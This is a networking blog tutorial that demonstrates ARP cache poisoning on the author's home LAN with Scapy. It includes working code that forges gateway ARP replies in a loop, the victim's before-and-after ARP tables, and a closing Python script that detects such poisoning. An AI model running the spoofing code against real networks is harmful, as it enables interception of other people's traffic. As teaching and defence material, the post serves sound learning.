Perform an ARP Poisoning Attack Using Scapy
In this post I will show you how to perform an ARP poisoning attack on a local network using a Python package called Scapy. Scapy is a package that allows us to craft our own packets, specifying all layers from layer 2 to layer 7.
In my local network I have two PCs, with addresses 192.168.1.73 and 192.168.1.78, respectively. The ADSL router has IP 192.168.1.254 and is the gateway of the two PCs.
My goal is to ARP poison PC 192.168.1.78 so that it sends its packets to PC 192.168.1.73 instead of the gateway 192.168.1.254.
Let's see the ARP table of 192.168.1.78:
arp -a
Interface: 192.168.1.78 --- 0xb
Internet Address Physical Address Type
192.168.1.73 fc-aa-14-01-cd-41 dynamic
192.168.1.254 00-1f-9f-ce-d3-94 dynamic
192.168.1.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Now I will create an ARP reply packet and send it from 192.168.1.73 to 192.168.1.78. If you don't have Scapy installed, do a pip install scapy, and run scapy. You will get a >>> prompt, where you can write Python code.
(base) D:\NetEng>pip install scapy
Requirement already satisfied: scapy in d:\anaconda3\lib\site-packages (2.4.3)
(base) D:\NetEng>scapy
aSPY//YASa
apyyyyCY//////////YCa |
sY//////YSpcs scpCY//Pp | Welcome to Scapy
ayp ayyyyyyySCP//Pp syY//C | Version 2.4.3
AYAsAYYYYYYYY///Ps cY//S |
pCCCCY//p cSSps y//Y | https://github.com/secdev/scapy
SPPPP///a pP///AC//Y |
A//A cyP////C | Have fun!
p///Ac sC///a |
P////YCpc A//A | Wanna support scapy? Rate it on
scccccp///pSP///p p//Y | sectools!
sY/////////y caa S//P | http://sectools.org/tool/scapy/
cayCyayP//Ya pY/Ya | -- Satoshi Nakamoto
sY/PsY////YCc aC//Yp |
sc sccaCY//PCypaapyCP//YSs
spCPY//////YPSps
ccaacs
using IPython 6.5.0
>>>
Then you can write Python code:
>>> arpspoofed = ARP(op=2, psrc="192.168.1.254", pdst="192.168.1.78",
...:                  hwdst="FC:AA:14:01:CD:41")
>>> arpspoofed.show()
###[ ARP ]###
hwtype= 0x1
ptype= IPv4
hwlen= None
plen= None
op= is-at
hwsrc= fc:aa:14:01:cd:41
psrc= 192.168.1.254
hwdst= FC:AA:14:01:CD:41
pdst= 192.168.1.78
>>> while(True):
...: send(arpspoofed)
Let's check the ARP table of 192.168.1.78 again:
(base) C:\Users\User>arp -a
Interface: 192.168.1.78 --- 0xb
Internet Address Physical Address Type
192.168.1.73 fc-aa-14-01-cd-41 dynamic
192.168.1.254 fc-aa-14-01-cd-41 dynamic
192.168.1.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
You can see that the target PC now believes that 192.168.1.254 has the hardware address of 192.168.1.73. From now on it will send all packets destined for 192.168.1.254 to 192.168.1.73.
So you can see that performing an ARP poisoning or man-in-the-middle attack is very easy. Of course there are ready-made tools that can automate all this for you, but I wanted to show you how to do it yourself.
To prevent this kind of attack, you have to apply DHCP snooping and ARP inspection on your local network. Please check my post on how to do this: Configuring dhcp snooping and arp inspection
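A host-side check to complement those switch features, as an added example that is not part of the original post: it parses Windows arp -a output like the two listings above and flags the gateway entry changing from a known-good baseline or sharing its MAC with another host. The function names and the choice of the first listing as the trusted baseline are assumptions made for this example.

```python
import re

# arp -a output of 192.168.1.78 taken from the first listing on this page
# (columns re-aligned); used here as the trusted baseline (assumption).
BEFORE = """\
Interface: 192.168.1.78 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.73          fc-aa-14-01-cd-41     dynamic
  192.168.1.254         00-1f-9f-ce-d3-94     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
# Second listing on the page: the gateway entry now carries the MAC of .73.
AFTER = BEFORE.replace("00-1f-9f-ce-d3-94", "fc-aa-14-01-cd-41")

ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})"
    r"\s+(dynamic|static)\s*$", re.I)

def parse_arp_table(text):
    """Return {ip: mac} for the dynamic entries of Windows `arp -a` output.

    Static rows (broadcast/multicast) are skipped: they legitimately share
    MACs and cannot be overwritten by ARP replies.
    """
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower()
    return table

def find_poisoning(baseline, current, gateway):
    """Compare two parsed tables and list indicators of ARP cache poisoning."""
    findings = []
    # Indicator 1: an IP whose MAC differs from the trusted baseline.
    for ip, mac in current.items():
        old = baseline.get(ip)
        if old and old != mac:
            findings.append(("mac_changed", ip, old, mac))
    # Indicator 2: another host on the LAN has the same MAC as the gateway.
    gw_mac = current.get(gateway)
    for ip, mac in current.items():
        if ip != gateway and gw_mac and mac == gw_mac:
            findings.append(("gateway_mac_shared", gateway, ip, mac))
    return findings

if __name__ == "__main__":
    base, now = parse_arp_table(BEFORE), parse_arp_table(AFTER)
    for finding in find_poisoning(base, now, "192.168.1.254"):
        print(finding)
```

Run periodically against live arp -a output, the second indicator also works without a baseline, since a gateway and a workstation should never resolve to the same MAC.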